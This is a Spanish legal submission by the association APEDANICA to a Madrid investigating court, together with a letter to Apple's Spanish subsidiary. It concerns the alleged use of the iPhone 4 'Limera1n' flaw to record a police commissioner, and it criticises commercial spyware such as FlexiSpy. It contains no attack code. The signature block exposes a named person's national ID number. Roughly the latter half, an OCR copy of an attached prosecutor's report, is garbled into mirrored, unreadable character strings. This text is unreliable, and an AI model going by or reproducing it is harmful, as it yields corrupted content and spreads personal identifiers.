Al ​ Juzgado de Instrucción 2 de Madrid​ , Dil.Prev. 4676/14 Pieza II por el fax 902998379 con copia para ​ Juzgado de Instrucción 11 Dil.Prev. 3034/2013 y también para Fiscalía Especial contra Criminalidad Informática (Elvira Tejada de la Fuente) y Abogacía del Estado documento con firma digital publicado​ en ​ www.cita.es/juzgado­iphone.pdf Hemos tenido acceso al informe de ​ EL FISCAL Alfonso San Román de fecha 8.6.16 que entendemos que no está sometido a ningún secreto sumarial y con la máxima publicidad al alcance de la Asociación APEDANICA ​ hemos trasladado a la empresa ​ APPLE nuestras inquietudes y preocupación porque lo ocurrido en el iPhone corporativo utilizado por Marcelino Martín­Blas mientras era Comisario de Asuntos Internos y conversaba con funcionarios del Centro Nacional de Inteligencia CNI, pueda ocurrir ahora mismo, o haya ocurrido en el pasado en más casos, en cualquier otro teléfono móvil. APEDANICA lleva tiempo investigando el espionaje de teléfonos móviles SMARTPHONES y en el especial caso de esta Pieza II de las Dil.Prev. 4676/14 del Juzgado de Instrucción 2 de Madrid tenemos entendido que el Centro Criptológico Nacional CCN del CNI subcontrató a una empresa privada para que un perito particular explicase lo ocurrido en el iPhone corporativo utilizado por Marcelino Martín­Blas, ​ sin resultado relevante alguno. No podemos comprender cómo existiendo numerosas plazas de funcionarios públicos tanto en la universidad pública como en el Consejo Superior de Investigaciones Científicas CSIC de supuestos expertos en seguridad informática, telefonía móvil y criptoanálisis forense, no se ha requerido ya el informe de tantos funcionarios públicos como sea necesario, y por otra parte, tampoco comprendemos cómo no consta ya en las actuaciones un informe de la empresa ​ APPLE con toda la información de que dispone, o puede conseguir actualmente sobre la vulnerabilidad de los Apple iPhone 4 conocida como “Limera1n” y también sobre cómo reconstruir todo lo ocurrido que pueda ser presuntamente delictivo​ . Por una parte, este juzgado y el juez instructor Arturo Zamarriego Fernández conoce y tiene documentadas las actividades particulares de funcionarios públicos como peritos privados durante años de empresas como BOLIDEN y entidades privadas como la Sociedad General de Autores y Editores SGAE, así como la utilización de recursos públicos para proteger, incluso de la más correcta crítica, tales negocios privados de funcionarios públicos. No es decente ni admisible que ante la gravedad de los hechos de los que informa Alfonso San Román ni un solo catedrático o profesor titular de universidad, ni tampoco profesor de investigación o investigador titular del CSIC haya emitido ninguna opinión sobre lo ocurrido en el iPhone corporativo utilizado por Marcelino Martín­Blas, al mismo tiempo que el CNI y el CCN financian, o informan favorablemente para que se financien proyectos tecnológicos en los que funcionarios públicos pueden enriquecerse sin límite ni control eficaz alguno. Por otra parte, basta con buscar ​ APPLE en el Boletín Oficial del Estado BOE para hacerse una idea de lo que las Administraciones Públicas han pagado para que muy diversos cargos y funcionarios públicos, incluyendo senadores y diputados nacionales o autonómicos, utilicen teléfonos ​ APPLE iPhone susceptibles de ser espiados como Alfonso San Román dice por escrito que lo ha sido, repetimos, nada menos que el iPhone corporativo utilizado por Marcelino Martín­Blas mientras era Comisario de Asuntos Internos y conversaba con funcionarios del Centro Nacional de Inteligencia CNI, lo que nos parece muy alarmante.


En resumen, considerando lo informado por ​ EL FISCAL Alfonso San Román con fecha 8.6.16, y considerando que se trata de un teléfono corporativo, parece ser que suministrado a la Administración General del Estado por una de las multinacionales más solventes del mundo, instamos al juzgado a que, a la mayor brevedad, REQUIERA: 1º Informe completo y detallado a la representación legal de ​ APPLE​ en España

APPLE MARKETING IBERIA SA DENOMINACIÓN SOCIAL

CIF

FECHA CONSTITUCIÓN

APPLE MARKETING IBERIA SA

A58022724

01/07/1985

OBJETO SOCIAL / ACTIVIDAD

CNAE 4618 ­ Intermediarios del comercio especializados en la venta de otros productos específicos

CAPITAL SOCIAL

REGISTRO

­

Madrid

DOMICILIO

CRA DE SAN JERONIMO 1 (MADRID).

TELÉFONO

FAX

913542900

916613810

PÁGINA WEB

E­MAIL

REDES SOCIALES

www.apple.com/es

informacion@euro.apple.com

ÓRGANO ADMINISTRACIÓN

PRESIDENTE

AUDITOR

Consejo de administración

Ortiz Finnemore Luis Jonathan

ERNST & YOUNG SL


2º ​ Que el juzgado nombre peritos con absoluta garantía de independencia a tres funcionarios con reconocida competencia en seguridad informática y criptología, así como en telefonía móvil y cuanto se evidencia como necesario para conocer, al menos, para garantizar que el espionaje de iPhones similares o incluso más antiguos que el corporativo utilizado por Marcelino Martín­Blas mientras era Comisario de Asuntos Internos y conversaba con funcionarios del Centro Nacional de Inteligencia CNI no puede volver a ocurrir. La asociación APEDANICA considera inadmisible que no exista un responsable en la Administración que pueda garantizar que la telefonía móvil corporativa utilizada por cargos y funcionarios públicos es segura. Es altamente sospechoso e indicio de corrupción que habiendo contratado ​ APPLE con la Administración el suministro de gran número de teléfonos iPhone no haya funcionarios capaces de coordinar una acción más eficaz contra el espionaje en la telefonía móvil corporativa de miembros del Cuerpo Nacional de Policía. APEDANICA combate activamente, y con publicidad sin contemplaciones ni complejos, toda IGNORANCIA DELIBERADA y los conflictos de intereses que posibilitan ​ corrupción​ , cobardía e ​ incompetencia en la Administración. Señalamos con sus nombres y apellidos especialmente a todos los cargos y funcionarios públicos responsables de delitos, abusos y negligencias en informática y comunicaciones avanzadas. Hacemos pública, nuestra crítica opinión sobre el enjuiciamiento del espionaje en España. El Juzgado de Instrucción 45 conoce bien nuestros esfuerzos y nosotros su perezosa lentitud pusilánime en relación al espionaje masivo de redes Wi­Fi reconocido por Google estando pendiente la apelación que mantenemos en ​ www.cita.es/apela­google y podemos ofrecer más referencias contra el espionaje en juzgados ​ www.cita.es/apela­chrome y ​ www.cita.es/querella­flexispy entre otras muchas más referenciables en Internet). Sabemos que muchos particulares están completamente indefensos ante sus propios proveedores de Internet y/o telefonía y que multinacionales como APPLE, Google, Nokia y Microsoft toleran productos como ​ FLEXISPY Spy Phone ​ Mobile Spy MSPY cuya función “espiológica” ilegal es, aparentemente, la misma que detectada en e​ l iPhone corporativo utilizado por el comisario Marcelino Martín­Blas. Tenemos la fundada sospecha de que la vulnerabilidad “Limera1n” ha sido mucho más utilizada de lo que se ha detectado, y también que existen productos ilegales específicamente diseñados para ello. ​ Instamos al Juzgado a que lo investigue a fondo​ . APEDANICA reitera también aquí todo lo ya manifestado en este Juzgado en la querella pendiente de admisión en ​ www.cita.es/querella­ai ampliada en ​ www.cita.es/ampliando­ai y reiterada en ​ www.cita.es/reitera­ai​ de la que no tenemos noticia judicial alguna. Por lo expuesto, al Juzgado se solicita que tenga por hechas estas manifestaciones y peticiones de APEDANICA requiriendo a ​ APPLE y nombrando a peritos funcionarios públicos con garantías de independencia y solvencia tecnológica específica, en Madrid, enviado por fax y correo electrónico al Juzgado con fecha de la firma digital en este documento publicado en Internet​ ​ www.cita.es/juzgado­iphone.pdf digitalmente por ENTIDAD ASOC ENTIDAD ASOC PARA LA Firmado PARA LA PREVENCION ESTUDIO DELITOS Se adjunta documento también en ABUSOS NEGLIGENCIAS EN INFORMATICA PREVENCION ESTUDIO www.cita.es/espionaje­iphone.pdf - CIF G80593254 - NOMBRE GALLARDO DELITOS ABUSOS ORTIZ MIGUEL ANGEL - NIF 07212602D que incluye informe de ​ EL FISCAL Nombre de reconocimiento (DN): c=ES, NEGLIGENCIAS EN al que hacemos aquí referencia. o=FNMT, ou=FNMT Clase 2 CA,

INFORMATICA - CIF G80593254 - NOMBRE GALLARDO ORTIZ MIGUEL ANGEL - NIF 07212602D

ou=703015345, cn=ENTIDAD ASOC PARA LA PREVENCION ESTUDIO DELITOS ABUSOS NEGLIGENCIAS EN INFORMATICA - CIF G80593254 - NOMBRE GALLARDO ORTIZ MIGUEL ANGEL - NIF 07212602D Fecha: 2016.06.26 20:14:54 +02'00'


Para ​ APPLE MARKETING IBERIA SA​ y ​ APPLE RETAIL SPAIN SL

Luis Jonathan Ortiz Finnemore en APPLE

Atn. ​ La Asociación APEDANICA, con datos oficiales en ​ www.cita.es/apedanica.pdf desde hace tiempo investiga el espionaje de teléfonos móviles SMARTPHONES. Muy recientemente hemos tenido conocimiento de que una vulnerabilidad de los Apple iPhone 4 conocida como “Limera1n” fue utilizada para realizar una grabación presuntamente ilegal a quien fue comisario de Asuntos Internos. Según parece, se han realizado algunos estudios e informes sobre esa vulnerabilidad por parte del Centro Criptológico Nacional ​ CCN del Centro Nacional de Inteligencia ​ CNI según describe el informe del fiscal Alfonso San Román que se adjunta, en el que se comprende la gravedad de lo ocurrido sin más comentarios nuestros. Por otra parte, APEDANICA también investiga el mercado de aplicaciones intrusivas y el

espionaje de teléfonos móviles smartphones mediante programas troyanos como FLEXISPY sobre el que la asociación APEDANICA tiene el máximo interés en alertar porque puede espiar de manera prácticamente indetectable cualquier móvil de última generación. No es el único producto, pero sí uno de los más conocidos comercialmente, sin que aún exista jurisprudencia alguna que le cite. ​ FLEXISPY ​ es funcionalmente equivalente a ​ Spy Phone ­ ​ Mobile Spy ­ MSPY y otros programas que consideramos extremadamente peligrosos y presuntamente delictivos. APEDANICA ya ha iniciado un procedimiento ante la ​ Federal Communications Comission​ ​ FCC​ como puede verse en inglés en ​ www.cita.es/fcc­complaint

Lamentablemente, los recursos de APEDANICA son muy modestos por lo que ​ buscamos patrocinadores interesados en las investigaciones que hemos iniciado para que los responsables de las intrusiones, y especialmente quienes comercializan sistemas que no pueden tener fin lícito alguno, indemnicen a los perjudicados. En nuestra opinión, la venta sin control de productos como F ​LEXISPY ­ ​ Spy Phone ­ ​ Mobile Spy ­ MSPY y otros similares debe ser controlada como si fuera armamento o instrumentos para fabricar monedas o billetes falsos. En caso de que se judicialice algún caso de espionaje en el que se haya empleado alguna de esas aplicaciones, el fabricante, importador, vendedor e instalador debe estar a la inmediata disposición del juzgado, en nuestra opinión, pero cuando ni siquiera se identifica, la inseguridad de los usuarios de smartphones no solamente es tecnológica sino también jurídica. APEDANICA trabaja para que no sea así.

Por todo ello, considerando la documentación adjunta, y las referencias que ofrecemos en ​ www.cita.es/flexispy­fiscal.pdf y ​ www.cita.es/querella­flexispy quisiéramos poder tratar con un interlocutor que conozca la vulnerabilidad “Limera1n” lo antes posible, por teléfono o en una pronta reunión en Madrid.

Dr. (PhD) ​ Miguel Gallardo​ , Tel. ​ 902998352​ Fax: 902998379 ​ apedanica.org@gmail.com Asociación APEDANICA ​ C/ Fernando Poo 16­6ºB E­28045 Madrid, SPAIN (ESPAÑA) Documento publicado​ en ​ www.cita.es/espionaje­iphone.pdf​ adjuntando informe de fiscal


PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor

Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf sa oTjop Un ap UOT3fl.SOAUT 1J iTrn as anb ¡TaTpnÍ sflo ap u9TYetJ.saAuT ap oi.Tqur a p1oqsap '(t'6t'T j) «sarnin6au a ap strna sauo nrn sns 'ua ¡miownstIi D.iniaqoa svwj aop'uvp ¡viaod OtWSiWO) asa y Ia6ao.1c[ ap s.JaLq oaiwi OLWSiWO ¡a fi ìa ivac[ UJ'Unfpv

sva

¡a ÙO3

'zaij orailJflhln

aia

ùoaaf

iniaan.ioa min asxa,, anb 'ojdrna[a od 'ouioa v ua (L6t'T Tsando.Td SauoTcyuuTJ uamq as anb 61T j) uinbouraap saUoTSn[3UO3 xasounoap A -auuojui ap Sj ap oprnauo JajD apEd IoAEm j ouxoo 'soqoaij sox.o ap u9133np0.qUT E'J UOT3EOTUflUTOO ap SOIpaUT SO[ uo u9TsnJrp ap aJqni.3o ap o

sj

iouasod ns A sajEToijod sElouapuadap ua

j7TO

aiva piqajaa P ja dND jap SOTIUOI3UnJ A IND jap saua sandns un ap u9oonpo1d u9TUnai un ua ET3JT u9T3EqEJ îaipnÍ Ezaid sa ap ol.aíqo Ej ap U9ToET1saAUT j (

ii

:uos SaUOT3EO3E SES3

IasJ aauojrn auasaid p SEJ e

'zaij ìsa

A

asip

spTuaqo Ejja ua EqanJd ap sauanj qap anb

uazus anb sauoTaj.00E sa.q uaaq as A

sej uip

opurp A OEUTJTJ

3UE3jE ja oTAaid

-'-'!T°P

iapio Uo3

oed

L17T ii Un1U ajap iopadsuj ousituoo ja iod u9TD3nisuJ ap opEznp r 'opEioqEja sa oi.uasa Ta 9TO ap oAEîn ap o

jpnp

ET43J ap qoaj ap ouosa ua (Ndr3) TEUOPEN EPTOd ap u9TsTno3 j .Tod EpE1.uasaid sauoIaEnaE ap EsandoJd-amJoJrn ja aqos ¿reuuojui ap uTJ ETauopTAoicT

iod opuajuoo

op 0AEUI ap o Eqoaj ap E '9TO opETsE.q ja OUEfl3EAO "ivosIi 'ia

http://www.cita.es/flexispy-fiscal.pdf www.cita.es/querella-flexispy www.cita.es/flexispy-juzgado y en inglés www.cita.es/fcc-complaint recomienda los siguientes enlaces relevantes para comprender el espionaje de teléfonos móviles smartphones:

jj EzaTd

17T /9L9t oiaurnu sETAald sEIouoTjTQ oiaurnu U9TO3fl.qSUJ ap opznp

pupjj ap

Dr. (PhD) Miguel Ángel Gallardo Ortiz, ingeniero, criminólogo, lic. y doctor en Filosofía, perito judicial privado, en mi propio nombre y derecho y también como presidente de la Asociación para la Prevención y Estudio de Delito Abusos y Negligencias en Informática y Comunicaciones Avanzadas (APEDANICA) en www.cita.es/apedanica.pdf Tel. 902998352 Fax: 902998379 E-mail: apedanica.ong@gmail.com para valorar e interpretar este documento que EL FISCAL Alfonso San Román dirige al


PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor

Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf ouioo u9ioBqBJ

unsoid

ns

T

op u9ioonpoJd

sond

uo ouBAo[aI uQTaTsod

i

SOpBtSOAUT

uo

ouì

soqooq

un uo aquon3uo os

so oj u9i3Bdr3tpd SOT

T°TV

B

OEJ.UBflO

srpoiod os

ZUNVNIJ NIN

"D

SO'INVD

0q5J BUJUJOD A ZOIOd OÍOJBITTA TOflUBIAT

OSOp

'ZopLTBUJoj JoTJ,J SOTI3 :sBuoslod SB.T.SO op soi'. op uorouoop sOil.o oauoa op SB.UOfl3 SB[ op ouodoid os T 01x103 SOPBU0ZYUTTB o sopnoq 'sopiqpol 'SOpBTAU0 sosuom 1030UO3 BIBd OOTUO.q.3oTo 001103 Op OL3TAIOS op so1opB.so1d

so.p

uquij4

SOT

B

SOEJ.U0TWBpUBUJ

soAtJJsodstp so..qo

'O3TUOIPOJ0

OuoTmBUo3BUITB

Op

'SoAt.TsodsTp op u9T3uoiuo1uT

A SOUOJJOJ. OUIO

'sBsolthuo op sopos A SOiTT3rLuOp op soisioi A sBpatuo souoi.sisuo3 srn3u0TIip saio ouxoo TSB sBuoslod j op 1x0

sOpBrl.SoAUT 01x103 UOizY1BT30p BJ MdF3 BI

iod ouodoid

o

0UOUJBB30B oS1B.uoTnn3op Bpond OUJIOJUT [Op OPTUO1.UO3 TO onb op A ououxBwTxo1d 10110 01.S0 1BUBSflS os onb op BsTuIoJd BI 0 oliBd osouodxo l3pond TB3S!J 110 SBPBITB1.OP OULIOJUT 0SO 1x0 onb oj opoj4 ouuoJuT oTdojd SBpB3tpBld SBI3U0TTTP SBT SBPOT B1.Tpol3B onb TBU0Wfl30P BI A

o.unÍ 'opBpodB q

'Bsond01d-ouuOJuI

011

NdFC)

'T

(

opBTnTxoidB

1BflT Ufl

1x0 'SBUO1.LIB SBUBA 1x03

UOT3BJflLTBLq op OSB3 110

'0

BU0UB BUfl op Blnl.10q03 op OTpBI JO iod BpOTqfl3 BUOZ BUfl UO UBUOfl3U0 os onb sBuoslod SBPBUTUIIO1.OP OpUOTOip O 0U0T3B nb 1BUTwJ00p BJBd ILL SB3TU9JoJo S0110T3B3UflU103

urnso

SBJ U0 UOI0TAflTUBUT OS

elBd

10 JUOJUT

SOPBIOTBA lOS

Ofib SOLTOT3BSIOAUO3 SBT op 0PTUO1.UO3 10d U05 onb Of 011103

JOIBA U0U0

uoqop

OU 'SOJOS IS

'U9T3BT1.SOAUT BI 1x0

S0BB301

'SO3TU9JO[O1

soAqlsodslp op U9T3BZT[B30[00 op SOB SOT 011103 TSB B3TUOJOI01. Sol.uoTpuodSono3 SBPBUIBTT op SBSTJ SBJ (

B0U!T BUfl B

SVIS3'TDI ZIJATOD SV'TODIN O3SflNVk1 iod SOtOUT03 PBP0SIBJ A SOUOT3UflJ op UOIDBdJflSfl 'BJBS0

ouourunsod op

SOTTTOP

Bj op

soi.sondns uBtJsoAuT os onb BI U0 'ZT.L)BUT BSflB3 ¡0 1x0 501.01305 op U013B10A01 A 01.uoTwUqfl3Sop op

03it.0


PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor

Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf 'so oso- ouoiqur opluos i opdo s nb u9T3s..TAuoo os 'J8I -'i'vi s ousauoo rp ouojjoj. [ zopuu..ToJ uqLJ J uoT33rnnmo3 Ts ¡op ouojojai. JO 0PZTTOJ -'°IIN osm a'so u oinsn ns qiaiod j çpTU onb zTjtn uomiod 01 onb urs oi.ouioi uo ouoJoo. ¡op souorounj TJTqq onb suTLjp souoT3BoTJd op

sj

uoiasui

onb ppTJTqwouJnA ouoqdj ouojo ¡op

s

oriesruioo ¡o iod opzqtì.n

ppTJTqaTouJnA ìj 9q3oAoJd og :ouoints opow J SJ-uiJAJ

onj opoJdmo O3Tm10JUT í°

ioquTsuoo ru aioidns

01

onb uts

OZTLj OS

t

'S OIeSTUJO3 u0TSTuiStrJ1. T

(t'

i j) stg-tnrnjij ouvsiwoo ¡ap ornpiodoo Oùof?la t vzipaì iapr sorn anb vpvwt i aprnipaw vpvzqtaI j qw6 ifl,, :mJTJ os ¡eo u9ToqJ opis' rnj ¡t6a L19 u9TsnJOuoO oppojoi opepde ¡o uo 'jtoijod OULt0JT E°P opuna u 'opuatqoJoo q;so as puajoi u9ufl3J 'A 9TTsxo onpoid os 'i000d P'T1 sa onb qan.Tdwoa pUJJ op ooTjq ¡oQ zopuu10 os 50uOJ?JOT soqui OTIlO S14 5TH uJJAI .T5 0TISTUI0Z) °JAT -'S ¡op ouojojoi. ¡0 ¡op ouojojoj. ¡o opsop ptjnusuq onj uoTunai so uo pruoi.uw sondoid-ouuojui ¡o uno op oTid un uOi3siOAu0O

xs

r

ZOTJ

JJ

SO

Í5Op

05

onb j op 'pi1pJA Op 0U uoîoonqsuj op OpZflÇ ¡0 171 /9L917 touìsns os onb oi.uoursiooid so ¡eiotpnl dcIE SJ Io sno wj souoTounj op uoTodJnsn A OS[J 'Jso op SOTIJOP soTsondns iod sì'rsojj zomoo sTo3TN o3srouaxj opT1.soAuT pinos ¡raipnh sno j op 'soio o.quo ¡o aquoo soJT3TJod surouopuodop uo dM3 ¡op souuoiounj A 1MO ¡op op oiqnoo op o p

'iq

rd

souo

o.quo uçnuna

un oqnq

soTund soTuoTnTs soj uo omnso..i os 3UUOJU ObrA MdPD Oj

t

T

uçiciqi ¡o

ej arqos

JouoTum

onb o op uotunsoi

tc

op ursnjip ¡ToTuT j opTuouoo ns A uoToqar ns 'uorunoi j op sornoqs nb ¿r1ij osiaoid A °m u9iq SO op ioianu oqooq so onb 01 iod ¡euTuxuo uoroqsour uprunoi j op iop u9Toq1 wj rnoiur u9snjip fl5 uo so

Io


PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor

Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf u9rqur SOT

oms opoTpuT A omqxo o oiqos ogs ou souuoT3unj .iopod atd opotpid ixaroqnq s su 3nb OTUTUAUO3 OpTS e1qH U93SOAU e

-i;urìid

souoijoop oqo

soqun

OpAOJJ

sno

50j SOtJSO Ej E

utj onb sj3TJod op odni

io

sojijs

'-'°pi.q souuoiounj

sopiouo

SOqooq SOT 1T1.SOAUT op SO LI SOUISIIU SO UOS oprieflo OtU1XJA jE3pflf Bsn SOj 9p S9UO3EULIOJU

U9933E

oqq

un

3

SOS

opui

°d

ULflJ os u9pGoo.Id ¡G sG ou SEj 9nb j iod 50[3jOd SOULIOJUT so uo onbiod osondns iod p os oqooq o.so uo OAflTIiW os onb U9T3SJOAUO3 onb i000.oed OOflrj 9TUO TS SOTIUOT3UflJ UOO OIOUIO3 uOT3qi j op U9T3dU3STIafl. iuno.icT .iopod JOPO3OiT3SO opis pq TTO!U sop soso os ou souoi iepop i T

'ousqo

uonotaid

oìund ouio

LT

UJflU OTIUOT3UflJ IT °N T°M TO iod pSoio.ui OflJ j) saj..oed STIA iod SPT3TTOS UOlOflJ TOP r T (9i SOp3TJt.UOpT 5O3TIOd SiOTTOd sop soso OD SOU0T3BIeT3OP LIq OU Sfl3 OUfltITU OIJ3O SOTiUOiOUflJ SO SOT O U111U oJop ¿toi.00dsuj ° 'TT0N SOnd t'T T T T °P S0]tIOSOld UO1OIA1TJSO UOTUflOJ i

SJ

T9-TITiIAI

'

eSO

..IS

uo onb uoiquI

3J.SeT3

'T

OPSmO3

TO

sopeprAae

soui000uo

SflS 5L3O13OS 011103

sond oUomBOToT SOUT030UOOSOp pepq.Uopi 3&fl3 SOP oi.uouiunsoid op SOUO

I

'rn3UOTT01LTT Op SOTOTAJO5

uoioipnoe

OP

17TO

eA U9TUflOI e

SOJ

OqrnO

P

e onb osieuotououi oqop

p

o oTAolcT

I°P

iopieo

PPnTe 1103 (T

so.UoTniS 50D

535[

SOUOTOeZtm

UO5

(SOUOTOefll3e

PPft°1 uo ouxoo) pepTTqisod owoa opTuo.

os

(esondo.id

o

OULTOJUT l°P SOUOTSnJDUOC)

5EJ op

5T op 03fl0 ¿ros

epond 019s

opnos oJaTid

9

OP O3fl0 os se) eZOpOD ouioo OSJODOqeSO opond U9TSnTOUOO IS U913eoiJttSflÍ u9toeqeJ et iouoi.qo eied opeo1duio OOUI SB[ op UOUO MdPO ¿rod uouodoid os onb SouOicyertpe oiied ue.wj Te3flOd ouuojuT oiqos SOUOTDeZtI.eU1 op ouos eun uoqop onb eJ0pTSUOD 'eZOTd SO 110 5OPeT1.5OAUT 50T

OSJO3eq

OIU0 op .TeoIonu

sopcfl.

ei opeqei epqeq os

A TeI3!U OqOOq

A

lP 051eei.

'T3SM

T

T01

.epTqToOJ u9TDesioAUoo '-soTeTolTod seTouopuodop 110 eiuonecu


PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor

Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf puoTouom j ouxoo seuiTjEp souoro3.rid o[qTsod so ou oA1ocTo moSis j IB.TOUJUA op U9T3ZTq.fl opuoioid onb Tp u9loTsodsLp ipso ou iíiçui ouoJ?1Io i° is (t6 j) ssn ¡o iioo .iopntiapio ¡t owpa-uoo v.rncí 'la9w oLIof?al i 'ornsoc[sp ¡D ¡1JJodlL1at osaxrn,, JOLT01. oqop OS OUOLTdJ ouojoj. 'so oiso 'topi TOP t JJodxo T° euispn J O3T1dXo oiiiod T° ouuojui Tp 'ç° uqT °P (T6J) s1n aqrx 'un apirnpaw .iopv'uop.Io 7D 7a9w ornsodsp aioijai os) ppiTqaioujflA ¡a rn.pouoo aqap as,, (ui iouurj J o.uoqur uuij os OuuoJui i u i ¿ro'dxo arad onb OUTOO StL1TUp SOuOT33iTd optuos o uoTTuuod anb S sui op uoio j oueipom oioaioi un iod opjoiuoa ouuojui io uo uoquosop ios opond oi.uotuiuoiounj n 17

id

ida

os onb sol.uoTuxip030ld

soso onb uinj op O3iUo T Oo[31u UO3 17

0g

SOT OPUZTIT1fl 17

STST[LT,,

oUOqjJ o

OI

0L104d1 SOT SOCfl.

so'[qaIouTnA uos OTO

souojo

ppqouJni

uo

°

OU

¡Op

t'Y 0T0P0W

'id iauo iono uo

uooq

:SouoT3uuTJ SO1UOTflTS S13[ S'epJOXJ.UOO OpTS uJoTqnq

un iod iod

OS SOULIOJUT SO]

sT9-urnJN

's

U

-

OJO3.IO.

OUSTUTO3 io

opzqn ¡A9m ouoJIo1. TOP souoiounj sj onb uo O1UO1,STSUO3

ppTTqTsod

und

un

u9pqat

og

9ZT[O1

I

OS

ZOiJO3 uoo i000jqso uouuod ro iod oatmJojui opom i aqo 3[Jfl.uoi3 ou soTT3uod souuojuT so;s j A (N33) Tu0M OOtOIo1.dTJ3 OiUO3 ¡o iod stouod StIA opoaid A 3tUUOJUT U931fldu3W op opiuouoo uq os 5965OOOL5TO JJ,\[J t' ouoqjj ì

sondns ns

s OUI3SILUOO

'

¡o iod opeziqn oAq'elodloo ouojp ¡o aiqog ouojoo lop uoisosod uo .nso ous000u so .Touoqo 'eicT spz n oi.uomunsoid 'suitJp o.ujop sm SOUTOJOA OtUOO (

'j op sondsop A sou'

u9ToqJ

isui

'u9Toqi souoT3oTTd

S

rd

opipoJ onj ouojjo ouounTAaId uoTnI sond 'uoiunai ' ns TS oiqos A u9lunol u OUOJTO1. TO OAOTI TS oiqos Sfl3 j uo oisondop aroiqnq sT9-ufl.JIAI is T° onb ouoTuoAuoo opTs uqq 'ojdmolo .Tod sopoup sotso uos SouuoT3unJ oiqos A sondoid-omiojui jo uo uoonpoquT os onb SOSO onb sopipoons soqooq sorj,o oiqos

osuo

50T


PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor

Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf

p od ouotup000id ¡ op000 ou onb oonu oqaoq çns..iaa un op 'zo aqo os stT j) «trog/6o/o la S 197 op UOlOD7l9.lSWOJ O 1J91C)1L)Zl7DflpD m1n l ow.ioJu i DwJlJùo anb owoxo

'aq

7P-°

J1P

ool597oJc1L1j

'sapiaip'uodsauoo saiopzqinrn sv rnzipai .rnd j7 ¡Q ap aiqwarjc[as uo sv'ig NLLIVI/[ ouaawj,j otrnslwoo ap ornimocLioa oùofoa ¡o otnnbai rnnoj i op ¡ruauao tiçnooawj tfl,, onb ooîp sondoid-ouuojuî Top u9TsnJauOo tusim U os NdF3

ouoo

i op

sESTA uoo ouoqoid 'oLToot{ un ITpOJ3 onb rns oiod oiuo ppTiqTsod ouioo

pu

OSeJOJA 'o.uaj.

iod oqo

suTip souoTooTJd opjsrn uiq

ai os onb 'so oso 'op;omoidwoa opso q ouoiu2rnuopunJ Tauou ns onb uonbipui onb soqsi uponb ou jçui

oTuLiojui qon.TcT unurn uo uos os ou OU0JTO1. jo u u9Tsnjouoo e'i 'opnso p ooqo ouoJIo T°P sTsqu pp so itpthuoo os onb opuoj.oid os is 'uoisnjauoo

po

opjnsoi

jo

r°i

sig-ii;rnpij ouvsiuloo ¡op ornruothoa oponci ou ic apivipaw 19p19z17198J OOf?la ¡D DZ7DI so.rnj onb vprnrn Opis Dq ¡196071 u9ic)vqDJ5 vi,, onb uuij 'sondoid ouuoju ns op oioj r 'NdP3 wj souoisnjauoo

si u

'souoani.o

si op

17t

9Tpoons

ouowjo..I onb 01 uoa opuodsauoa os 'jna souioaouoasop 'sjjo op un oj9 ojqTsoci so souoiodo sop sij op atoTnbjen3 5TH -utj.ij,sj i jo iod opzTjq.n 'o.o.iouoo oAtTsodsTp jo uo (t :osioqop opond os

olos

o spnoq uoionj ounu onb spzijoi suip (

uojsuT

onb

souoiaaiodo sT op soaquuoJui soqsi 'osij

o sojnprsoi souoTamioJuT uoponb ou onb op oqooq jo so Jod (ol.JonA 6J) SDpDzflDa1 SOÙO100D SD7 ap ap 7vflpiSa! u9a19w.4ofLn op'Lrnpanb o'u 'svprnw3J6wc[ ?J9rflJaJO 197 OtID1pOW OWOO Dfl1312IOÙ1 13 UL1 of Op 0J1J13J 'SÌYJOCLII9O SO(ULjID d13WW17O 12Wd .18U190731 OWOO Sa1O3D3L7dD JD7DSLU

imo.oi

saw

O

opipoci vq 0JD3D9 i0 'oof?7o ¡a opiawwc1woa opls aqiq op 0S190 ¡3 'LAO,, A sD'LflWp SdIOlalXfl/dD SDDLI1WDX0 S0IO1OO13.JP(O S197

'Ud

ODLIO3'U0

ÙDt

OS

0j,, :oAnjouoo os sj-uJwJ,\J

oii'siuioo jo iod op'zTjtn 965OOOL5TO 1011/\[I 17 ouoijj op orpnìso fou ouopio ¡op opruouoa top souotoaatxo

sj


PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor

Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf STO3M ogonbod T

P opTUoj.UO3

j,,

°-'n IND A T3UO1.STXO

:soTn3re so uo T

opugno o]qisuog LT9TouuoJuJ oTpoul

P3OUO3 o

uo

TO

OU

zopuuioj

APO1.

JoJAJ

S

LTIOS 'QyÇ[ iod sopoqqnd soTnoie SOJ 'opuno 'NdP3 A SO.UO.STS SOT OUoTmTO0UO3 UUO1. 0T9S u9ToarqoJoo ns op wj sondoid-oauojui T° uios uTqux PmTT WJ UT3OUO3 OS OU T

OJ3OS alo uoiunoi A 'UOTUflOI BT OLIInp

suosiod siqur

fl-I

'TT3TTOd

°-'°

uoJuT

s-utpw

UIS

'opLrno zopuuioJ

ig ousTUJoD Top SOUOJJO1. °HAI 1S oprouo T° A PmTT Ufl Op T3UO1SXO SOT 0J1.UO ugToaTnp op SOflUTW T °P 'OJOuTTId SOp UOS 'sosoqoodsos 'soqooq SOS3 U93qaI op ion oqisod ouxoo UOTUOS oj s onb soqooq so.q.o ou onb oTJTuTs ou zopuuJo{ ..ToTJA 50T13 ouTujuouT onb ot.uuuoJuT uqond uAuq OU onb op oqooq T° 'oiuquio u T

T

(uT3qo

T

OD JaTOUO

